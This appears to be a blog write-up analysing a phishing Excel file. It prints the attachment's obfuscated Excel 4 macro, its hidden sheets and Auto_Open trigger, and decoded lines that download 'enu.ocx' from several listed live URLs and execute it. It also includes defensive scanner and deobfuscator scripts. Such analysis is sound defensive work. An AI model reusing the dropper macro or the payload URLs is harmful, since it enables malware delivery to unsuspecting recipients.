Malware in Excel?

Background

I saw a post on Facebook from a user who mentioned that he had received an email from an internet provider with an Excel file as an attachment, but the email was different from the regular emails.

This post caught my attention and I decided to dig into the attachment to find out whether it is malware or not and, if it is, what the malware does.

So I asked for the Excel file and downloaded it to my machine.

Identifying that the Excel File is Infected

The file I downloaded had the .xlsx extension. If you are familiar with the format, you know it is just a zip file containing a bunch of .xml files, so I unzipped it:

$ unzip Payment\ details.xlsx 
Archive:  Payment details.xlsx
Aspose.Cells v22.2.5
  inflating: xl/worksheets/sheet2.xml  
  inflating: xl/worksheets/sheet3.xml  
  inflating: xl/worksheets/sheet5.xml  
  inflating: xl/drawings/drawing1.xml  
  inflating: xl/macrosheets/sheet1.xml  
  inflating: xl/printerSettings/printerSettings1.bin  
  inflating: xl/worksheets/sheet1.xml  
  inflating: docProps/core.xml       
  inflating: docProps/app.xml        
  inflating: xl/theme/theme1.xml     
  inflating: xl/workbook.xml         
  inflating: xl/calcChain.xml        
  inflating: xl/media/image1.png     
  inflating: xl/worksheets/sheet4.xml  
  inflating: xl/styles.xml           
  inflating: xl/sharedStrings.xml    
  inflating: [Content_Types].xml     
  inflating: xl/worksheets/_rels/sheet2.xml.rels  
  inflating: xl/drawings/_rels/drawing1.xml.rels  
  inflating: xl/worksheets/_rels/sheet1.xml.rels  
  inflating: xl/_rels/workbook.xml.rels  
  inflating: _rels/.rels             

After unzipping the file I checked the macro sheet to see if it really contains malware (the output is beautified to make the code easier to read):

$ cat xl/macrosheets/sheet1.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<worksheet
	xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
	xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
	xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing"
	xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main"
	xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3"
	xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"
	xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"
	xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision"
	xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"
	xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3"
	xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0300-000000000000}" xr:uid="{05bb2f47-8f87-4278-9454-68d76267ebb2}">
	<dimension ref="D7" />
	<sheetViews>
		<sheetView showFormulas="1" workbookViewId="0" topLeftCell="A1" />
	</sheetViews>
	<sheetFormatPr defaultColWidth="8.714285714285714" defaultRowHeight="15" />
	<cols>
		<col min="1" max="3" width="8.714285714285714" style="1" />
		<col min="4" max="4" width="8.714285714285714" style="1" hidden="1" customWidth="1" />
		<col min="5" max="16384" width="8.714285714285714" style="1" />
	</cols>
	<sheetData>
		<row r="7" spans="4:4" ht="15">
			<c r="D7" s="1" t="b">
				<f>FORMULA('Je1'!D17,'Je2'!E6)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!G18&amp;Lefasbor1!R10&amp;Lefasbor1!P5,D10)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH1"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!G20&amp;Lefasbor1!R10&amp;Lefasbor1!P5&amp;Vfrbuk1!P13,D12)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH2"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!G22&amp;Lefasbor1!R10&amp;Lefasbor1!P5&amp;Vfrbuk1!P13,D14)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH3"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!G24&amp;Lefasbor1!R10&amp;Lefasbor1!P5&amp;Vfrbuk1!P13,D16)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH4"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!I18&amp;Lefasbor1!R10&amp;Lefasbor1!P5&amp;Vfrbuk1!P13,D18)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH5"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!I20&amp;Lefasbor1!R10&amp;Lefasbor1!P5&amp;Vfrbuk1!P13,D20)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH6"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!B15&amp;Vfrbuk1!I17&amp;Vfrbuk1!I3&amp;Vfrbuk1!H13&amp;Vfrbuk1!P11&amp;Vfrbuk1!K9&amp;Vfrbuk1!P13&amp;Vfrbuk1!P7&amp;Vfrbuk1!P13,D22)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!H13&amp;Vfrbuk1!N4&amp;Vfrbuk1!H13&amp;Vfrbuk1!H9&amp;Vfrbuk1!P11&amp;Vfrbuk1!P15&amp;Vfrbuk1!H9&amp;Vfrbuk1!P20&amp;Lefasbor1!T3&amp;Lefasbor1!Q14&amp;Lefasbor1!N13&amp;Lefasbor1!J14&amp;Lefasbor1!N3&amp;Vfrbuk1!P15&amp;Vfrbuk1!P13,D24)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!G24&amp;Vfrbuk1!H13&amp;Vfrbuk1!E6&amp;Vfrbuk1!E11&amp;Vfrbuk1!F4&amp;Vfrbuk1!K23&amp;Vfrbuk1!P11&amp;Vfrbuk1!P13,D33)</f>
				<v>1</v>
			</c>
		</row>
	</sheetData>
	<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3" />
	<pageSetup orientation="portrait" />
</worksheet>   

We can see the function FORMULA, which is an Excel 4 macro (XLM) function. This type of macro was introduced in Excel 4 and replaced by VBA when Excel 5 came out (in 1993!). Still, in 2022, Microsoft Excel supports Excel 4 macros for backwards-compatibility reasons, and recently phishers have been using this old-school type of macro to deliver malware.

So we have confirmed that the Excel file indeed contains malware.
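The checks made by hand above (a macrosheet part in the archive, hidden sheets and an Auto_Open name in xl/workbook.xml, and dangerous XLM functions inside the macrosheet formulas) can be automated for triage. The following script is an added example and is not code from the original post; the function names, the watch-list of functions and the miniature package produced by build_sample() are all constructed for this example and do not reproduce the real attachment.

```python
"""Triage an .xlsx/.xlsm package for Excel 4 (XLM) macro indicators.

Added example (not code from the original post). It automates the checks the
post performs by hand: a macrosheet part in the zip, hidden sheets and an
Auto_Open defined name in xl/workbook.xml, and dangerous XLM functions inside
macrosheet formulas. The package built by build_sample() is constructed for
this example and is not the real attachment.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}
REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# XLM functions that download, execute or stage code; their presence in a
# macrosheet deserves an analyst's attention even before de-obfuscation.
SUSPICIOUS_FUNCS = ("CALL", "EXEC", "REGISTER", "FORMULA", "RUN", "FOPEN", "FWRITE")
FUNC_RE = re.compile(r"\b(" + "|".join(SUSPICIOUS_FUNCS) + r")\s*\(")


def scan_workbook(data: bytes) -> dict:
    """Return the XLM indicators found in the OOXML package `data`."""
    findings = {"macrosheets": [], "hidden_sheets": [], "auto_open": [],
                "suspicious_calls": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        # Excel stores XLM macro sheets under xl/macrosheets/, never under xl/worksheets/.
        findings["macrosheets"] = sorted(n for n in names if n.startswith("xl/macrosheets/"))
        if "xl/workbook.xml" in names:
            wb = ET.fromstring(z.read("xl/workbook.xml"))
            for sheet in wb.iterfind("m:sheets/m:sheet", NS):
                if sheet.get("state") in ("hidden", "veryHidden"):
                    findings["hidden_sheets"].append(sheet.get("name"))
            for dn in wb.iterfind("m:definedNames/m:definedName", NS):
                # Auto_Open makes the macro run as soon as the workbook is opened.
                if "auto_open" in (dn.get("name") or "").lower():
                    findings["auto_open"].append(dn.text)
        for part in findings["macrosheets"]:
            root = ET.fromstring(z.read(part))
            for f in root.iterfind(".//m:f", NS):
                for m in FUNC_RE.finditer(f.text or ""):
                    name = m.group(1)
                    findings["suspicious_calls"][name] = findings["suspicious_calls"].get(name, 0) + 1
    return findings


def is_suspicious(findings: dict) -> bool:
    """A macrosheet plus either an auto-start name or a dangerous call is the pattern seen in the post."""
    return bool(findings["macrosheets"]) and bool(findings["auto_open"] or findings["suspicious_calls"])


def build_sample() -> bytes:
    """Constructed miniature of the post's package layout (sample data, not the real file)."""
    workbook = (
        f'<workbook xmlns="{NS["m"]}" xmlns:r="{REL_NS}"><sheets>'
        '<sheet name="Vfrbuk1" sheetId="2" state="hidden" r:id="rId3"/>'
        '<sheet name="Sheet" sheetId="8" r:id="rId4"/></sheets>'
        '<definedNames><definedName name="Auto_Open">EFALGV!$D$1</definedName>'
        '</definedNames></workbook>'
    )
    macro = (
        f'<worksheet xmlns="{NS["m"]}"><sheetData><row r="7"><c r="D7" t="b">'
        '<f>FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!H9,D10)=FORMULA(CALL("urlmon","URLDownloadToFileA"),D12)</f>'
        '<v>1</v></c></row></sheetData></worksheet>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/worksheets/sheet1.xml", f'<worksheet xmlns="{NS["m"]}"/>')
        z.writestr("xl/macrosheets/sheet1.xml", macro)
    return buf.getvalue()


if __name__ == "__main__":
    result = scan_workbook(build_sample())
    print(result, "-> suspicious" if is_suspicious(result) else "-> clean")
```

To run it against a real sample, pass the bytes of the .xlsx to scan_workbook(); the presence of xl/macrosheets/ alone is already unusual for a legitimately produced invoice, and the combination with Auto_Open and CALL/EXEC is the pattern this post found.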

Digging into the malware

As it uses Excel 4 macros, I quickly opened the Excel 4 macro function reference and looked up the FORMULA function.

  • The FORMULA function takes two arguments, formula_text and reference. It takes the value in formula_text and writes it into the spreadsheet at the cell given by reference.

But the text in FORMULA seemed unreadable (this was done to evade antivirus detection by obfuscating the function calls).

Let's make the macro function a bit more readable. To do this I replaced each &amp; with a newline:

FORMULA('Je1'!D17,'Je2'!E6)=FORMULA(Vfrbuk1!P22
Vfrbuk1!H9
Vfrbuk1!L2
Vfrbuk1!B15
Vfrbuk1!B15
Lefasbor1!E4
Lefasbor1!B8
Lefasbor1!D12
'Je2'!E6
Lefasbor1!G9
Lefasbor1!K2
Lefasbor1!G18
Lefasbor1!R10
Lefasbor1!P5,D10)
(....) (redacted to save space)

But there are still some random-looking names like Vfrbuk1 and Lefasbor1, and we don't know what they are.

In Excel a cell is referenced using the syntax SheetName!ColumnRow, and Vfrbuk1!H9 matches that format. So it looks like Vfrbuk1 and Lefasbor1 are the names of sheets in the workbook. We can check the sheet names in xl/workbook.xml:

$ cat xl/workbook.xml

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workbook
	xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
	xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" mc:Ignorable="x15 xr xr6 xr10 xr2"
	xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
	xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"
	xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision"
	xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10"
	xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"
	xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6">
	<fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22527" />
	<workbookPr />
	<mc:AlternateContent
		xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
		<mc:Choice Requires="x15">
			<x15ac:absPath url="C:\Users\Admin\Desktop\File\1mar\CIR-ZV\"
				xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" />
		</mc:Choice>
	</mc:AlternateContent>
	<bookViews>
		<workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" firstSheet="1" activeTab="1" />
	</bookViews>
	<sheets>
		<sheet name="Vfrbuk1" sheetId="2" state="hidden" r:id="rId3" />
		<sheet name="Sheet" sheetId="8" r:id="rId4" />
		<sheet name="Lefasbor1" sheetId="3" state="hidden" r:id="rId5" />
		<sheet name="EFALGV" sheetId="4" state="hidden" r:id="rId6" />
		<sheet name="Je1" sheetId="5" state="hidden" r:id="rId7" />
		<sheet name="Je2" sheetId="6" state="hidden" r:id="rId8" />
	</sheets>
	<definedNames>
		<definedName name="DDDDD1">#REF!</definedName>
		<definedName name="DDWD">#REF!</definedName>
		<definedName name="DDWD1">#REF!</definedName>
		<definedName name="DDWD2">#REF!</definedName>
		<definedName name="DDWD3">#REF!</definedName>
		<definedName name="DDWD4">#REF!</definedName>
		<definedName name="GFGH1">EFALGV!$D$10</definedName>
		<definedName name="GFGH2">EFALGV!$D$12</definedName>
		<definedName name="GFGH3">EFALGV!$D$14</definedName>
		<definedName name="GFGH4">EFALGV!$D$16</definedName>
		<definedName name="GFGH5">EFALGV!$D$18</definedName>
		<definedName name="GFGH6">EFALGV!$D$20</definedName>
		<definedName name="KKLD8">#REF!</definedName>
		<definedName name="Auto_Open">EFALGV!$D$1</definedName>
	</definedNames>
	<calcPr calcId="191029" />
	<extLst>
		<ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}"
			xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures">
			<xcalcf:calcFeatures>
				<xcalcf:feature name="microsoft.com:RD" />
				<xcalcf:feature name="microsoft.com:FV" />
			</xcalcf:calcFeatures>
		</ext>
	</extLst>
</workbook>

Indeed we were right: <sheet name="Vfrbuk1" sheetId="2" state="hidden" r:id="rId3" /> shows that Vfrbuk1 is sheet 2, and that it is hidden (as are Lefasbor1, EFALGV, Je1 and Je2, so a user opening the file only sees the sheet named Sheet). Note that sheetId is not the number in the sheetN.xml file name; the r:id value is mapped to the actual part in xl/_rels/workbook.xml.rels. The sheet parts live in xl/worksheets:

[/tmp/ok/test/xl/worksheets]
└─$ ls -la
total 36
drwxr-xr-x 3 parallels parallels 4096 Mar  4 15:46 .
drwxr-xr-x 9 parallels parallels 4096 Mar  4 15:46 ..
drwxr-xr-x 2 parallels parallels 4096 Mar  4 15:46 _rels
-rw-r--r-- 1 parallels parallels 5229 Jan  1  1980 sheet1.xml
-rw-r--r-- 1 parallels parallels 1363 Jan  1  1980 sheet2.xml
-rw-r--r-- 1 parallels parallels 3907 Jan  1  1980 sheet3.xml
-rw-r--r-- 1 parallels parallels 1470 Jan  1  1980 sheet4.xml
-rw-r--r-- 1 parallels parallels 1385 Jan  1  1980 sheet5.xml

If we check sheet1.xml:

$ cat sheet1.xml
<?xml version=".0" encoding="UTF-8" standalone="yes"?>
<worksheet
	xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
	xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
	xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing"
	xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main"
	xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3"
	xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"
	xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"
	xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision"
	xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"
	xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xr:uid="{00000000-0001-0000-0100-000000000000}">
	<dimension ref="A2:Q37" />
	<sheetViews>
		<sheetView workbookViewId="0" topLeftCell="A1" />
	</sheetViews>
	<sheetFormatPr defaultRowHeight="15" />
	<cols>
		<col min="1" max="16384" width="9.142857142857142" style="1" />
	</cols>
	<sheetData>
		<row r="2" spans="5:12" ht="15">
			<c r="E2" s="1" t="str">
				<f>CHAR(113-2)</f>
				<v>o</v>
			</c>
			<c r="G2" s="1" t="str">
				<f>CHAR(111-6)</f>
				<v>i</v>
			</c>
			<c r="L2" s="1" t="str">
				<f>CHAR(71-6)</f>
				<v>A</v>
			</c>
		</row>
    (....) [redacted to save space]
		<row r="37" spans="11:11" ht="15">
			<c r="K37" s="1">
				<f>_xlfn.ARABIC("CI")</f>
				<v>101</v>
			</c>
		</row>
	</sheetData>
	<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3" />
	<pageSetup orientation="portrait" paperSize="9" r:id="rId1" />
</worksheet>

In this XML file the only thing that matters to us is <c r="E2" s="1" t="str"> together with <v>o</v>, because it tells us that the obfuscated reference in the macro formula, Vfrbuk1!E2, resolves to 'o' (the cached result of CHAR(113-2)).

Like this we can decode all the obfuscated macro functions, and this is what I got after decoding. (There might be some problems with the decoded version because I was too lazy to decode everything perfectly lol)

=FORMULA(=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,6,..\enu.ocx",0,0),D10)
=FORMULA(=IF("GFGH1"<0,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,7,..\enu.ocx",0,0),D12)
=FORMULA(=IF("GFGH2"<0,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,8,..\enu.ocx",0,0),D14)
=FORMULA(=IF("GFGH3"<0,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,9,..\enu.ocx",0,0),D16)
=FORMULA(=IF("GFGH4"<0,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,10,..\enu.ocx",0,0),D18)
=FORMULA(=IF("GFGH5"<0,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,11,..\enu.ocx",0,0),D20)
=FORMULA(=IF("GFGH6"<0,=CLOSE(0),),D22)
=FORMULA(=EXEC("C:435 2<0, ..\enu.ocx"),D24)
=FORMULA(=RETURN(),D33)

The macro downloads a file called enu.ocx from a remote URL and executes it silently. The numbers 6, 7, 8, 9, 10 and 11 are placeholders for the remote URLs: they are indices into the workbook's shared string table, which we can see in xl/sharedStrings.xml:

$ cat xl/sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst
	xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="13" uniqueCount="13">
	<si>
		<t>G</t>
	</si>
	<si>
		<t>!</t>
	</si>
	<si>
		<t>/</t>
	</si>
	<si>
		<t>SysWow64\</t>
	</si>
	<si>
		<t>\Windows\</t>
	</si>
	<si>
		<t>r"&amp;"eg"&amp;"sv"&amp;"r32.exe</t>
	</si>
	<si>
		<t>"http://piajimenez.com/Fox-C/dS4nv3spYd0DZsnwLqov/","</t>
	</si>
	<si>
		<t>"http://inopra.com/wp-includes/3zGnQGNCvIKuvrO7T/","</t>
	</si>
	<si>
		<t>"http://biomedicalpharmaegypt.com/sapbush/BKEaVq1zoyJssmUoe/","</t>
	</si>
	<si>
		<t>"https://getlivetext.com/Pectinacea/AL5FVpjleCW/","</t>
	</si>
	<si>
		<t>"http://janshabd.com/Zgye2/","</t>
	</si>
	<si>
		<t>"https://justforanime.com/stratose/PonwPXCl/","</t>
	</si>
	<si>
		<t>e</t>
	</si>
</sst> 

These are all the URLs the macro sends requests to in order to download the enu.ocx file.
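The manual lookups above (Vfrbuk1!E2 resolves to the cached value 'o', and a cell of type "s" is an index into sharedStrings.xml) can be done programmatically for every reference in a concatenation. The script below is an added example, not the post's code: it maps sheet names to their sheetN.xml parts through xl/_rels/workbook.xml.rels, collects the cached <v> values, expands shared-string cells, and then rebuilds the string that an &-concatenation evaluates to. The input is a dict of part name to XML text, as you would read it from the unzipped .xlsx; SAMPLE is a constructed miniature with a placeholder URL, not the real attachment, and all function names are this example's own.

```python
"""Resolve obfuscated XLM cell references to the cached values Excel stored.

Added example, not the post's code. Input is a dict of OOXML part name -> XML
text as read from the unzipped .xlsx; SAMPLE below is constructed.
"""
import re
import xml.etree.ElementTree as ET

M = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
# 'Quoted Sheet'!A1 or Sheet!A1, optionally with $ anchors.
REF_RE = re.compile(r"(?:'([^']+)'|([A-Za-z0-9_]+))!\$?([A-Z]{1,3})\$?(\d+)")


def sheet_parts(parts):
    """Map sheet name -> part path. sheetId is not the file number; r:id is resolved via the .rels part."""
    rels = ET.fromstring(parts["xl/_rels/workbook.xml.rels"])
    targets = {r.get("Id"): r.get("Target") for r in rels.iter(f"{{{PKG}}}Relationship")}
    mapping = {}
    for s in ET.fromstring(parts["xl/workbook.xml"]).iter(f"{{{M}}}sheet"):
        target = targets[s.get(f"{{{R}}}id")]
        mapping[s.get("name")] = target.lstrip("/") if target.startswith("/") else "xl/" + target
    return mapping


def shared_strings(parts):
    """Shared string table in index order (cells with t="s" store an index into it)."""
    if "xl/sharedStrings.xml" not in parts:
        return []
    root = ET.fromstring(parts["xl/sharedStrings.xml"])
    return ["".join(t.text or "" for t in si.iter(f"{{{M}}}t")) for si in root.iter(f"{{{M}}}si")]


def cell_values(parts):
    """Return {(sheet_name, 'E2'): cached value} for every cell that carries a <v> element."""
    sst, values = shared_strings(parts), {}
    for name, part in sheet_parts(parts).items():
        for c in ET.fromstring(parts[part]).iter(f"{{{M}}}c"):
            v = c.find(f"{{{M}}}v")
            if v is not None:
                text = v.text or ""
                values[(name, c.get("r"))] = sst[int(text)] if c.get("t") == "s" else text
    return values


def split_concat(expr):
    """Split a concatenation on '&' characters that sit outside double-quoted literals."""
    pieces, cur, in_quote = [], [], False
    for ch in expr:
        if ch == '"':
            in_quote = not in_quote
        if ch == "&" and not in_quote:
            pieces.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    pieces.append("".join(cur).strip())
    return pieces


def deobfuscate(expr, values):
    """Rebuild the string the concatenation evaluates to; unknown references are left as-is."""
    out = []
    for piece in split_concat(expr):
        if len(piece) >= 2 and piece[0] == piece[-1] == '"':
            out.append(piece[1:-1].replace('""', '"'))  # string literal: drop the quotes
            continue
        m = REF_RE.fullmatch(piece)
        key = (m.group(1) or m.group(2), m.group(3) + m.group(4)) if m else None
        out.append(values.get(key, piece))
    return "".join(out)


SAMPLE = {  # constructed miniature of the post's package, not the real attachment
    "xl/workbook.xml": (
        f'<workbook xmlns="{M}" xmlns:r="{R}"><sheets>'
        '<sheet name="Vfrbuk1" sheetId="2" state="hidden" r:id="rId3"/>'
        '<sheet name="Je2" sheetId="6" state="hidden" r:id="rId8"/></sheets></workbook>'),
    "xl/_rels/workbook.xml.rels": (
        f'<Relationships xmlns="{PKG}">'
        '<Relationship Id="rId3" Type="t" Target="worksheets/sheet1.xml"/>'
        '<Relationship Id="rId8" Type="t" Target="worksheets/sheet5.xml"/></Relationships>'),
    "xl/sharedStrings.xml": (  # index 2 holds a placeholder URL, the post's are real
        f'<sst xmlns="{M}"><si><t>G</t></si><si><t>!</t></si>'
        '<si><t>"http://example.invalid/stage/","</t></si></sst>'),
    "xl/worksheets/sheet1.xml": (
        f'<worksheet xmlns="{M}"><sheetData><row r="2">'
        '<c r="E2" t="str"><f>CHAR(113-2)</f><v>o</v></c>'
        '<c r="G2" t="str"><f>CHAR(111-6)</f><v>i</v></c>'
        '<c r="L2" t="str"><f>CHAR(71-6)</f><v>A</v></c>'
        '<c r="P22" t="s"><v>2</v></c></row></sheetData></worksheet>'),
    "xl/worksheets/sheet5.xml": (
        f'<worksheet xmlns="{M}"><sheetData><row r="6">'
        '<c r="E6" t="str"><v>=</v></c></row></sheetData></worksheet>'),
}

if __name__ == "__main__":
    vals = cell_values(SAMPLE)
    print(deobfuscate("'Je2'!E6&Vfrbuk1!L2&Vfrbuk1!E2&\"GFGH1\"&Vfrbuk1!G2", vals))
    print(deobfuscate("Vfrbuk1!P22", vals))
```

Feeding the first argument of each FORMULA(...) call from the macrosheet into deobfuscate() with the values of the real workbook yields the decoded lines shown above. The cached <v> values are only present because the sample was saved after calculation; a workbook saved without cached values would need the CHAR(...) formulas evaluated first.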

If you google any of the URLs you can find lists of other websites delivering similar malware, for example https://urlhaus.abuse.ch/downloads/text_recent/